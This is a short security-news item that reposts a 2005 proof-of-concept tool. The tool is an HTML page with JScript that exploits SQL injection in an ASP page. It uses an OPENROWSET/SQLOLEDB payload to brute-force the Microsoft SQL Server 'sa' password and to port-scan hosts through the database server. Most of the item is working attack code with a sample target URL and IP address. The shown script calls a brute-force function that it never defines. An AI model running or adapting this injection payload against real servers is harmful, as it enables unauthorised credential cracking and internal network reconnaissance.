Credit:
The information has been provided by offtopic.
The original article can be found at: http://www.securitylab.ru/_tools/2005/05/sqlbrut.zip

Details
Base on the article linked in our previous article: Manipulating Microsoft SQL Server Using SQL Injection, the following tool will utilize SQL injection vulnerabilities to brute force MS SQL's sa password.

Tool:
< html>
< h3>
MS SQL Server passwords bruteforce PoC via SQL Injection
< /h3>
(c)oded by Sergey V. Gordeychik 2005< br>
< a href=mailto: offtopic@mail.ru>offtopic@mail.ru< /a>
< hr>
< table>
< tr>
< td>
URL with injection:
< /td>
< td>
< input type=text Value="http://200.4.4.106/inject.asp?id=1;< ***>" id=baseurl>
< /td>
< tr>
< td>
Passwords file:
< /td>
< td>
< input type=text Value="passwords.txt" id=passwords>
< /td>
< /table>
< input type=button Value="Start" onclick="brut();">
< hr>
< h3>
Network port scanner via SQL Injection
< /h3>
< hr>
< table>
< tr>
< td>
Server:
< /td>
< td>
< input type=text Value="200.4.4.6" id=server>
< tr>
< td>
Port to scan:
< /td>
< td>
< input type=text Value="445" id=port>
< /table>
< input type=button Value="Check" onclick="scan();">
< hr>
< a id="status">< /a>

< script language="JScript">

var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
var inject = "select * from openrowset('SQLOLEDB','.';'sa';'pass','select 1')"

function scan()
{

var x,s = inject.replace(".", document.getElementById("server").value + "," + document.getElementById("port").value);
s = document.getElementById("baseurl").value.replace("< ***>", s);
xmlhttp.Open("GET", s, false);
xmlhttp.Send();
x = xmlhttp.responseText;
if (x.indexOf("SQL Server does not exist")>=1) s="closed"; else
if (x.indexOf("Timeout expired")>=1) s="filtered or unreachable"; else
if (x.indexOf("Login failed")>=1) s="SQL Server detected."; else s="open";
document.getElementById("status").innerHTML="Scaned " + document.getElementById("server").value + ":" + document.getElementById("port").value + ".Port status:< b>"+s;

}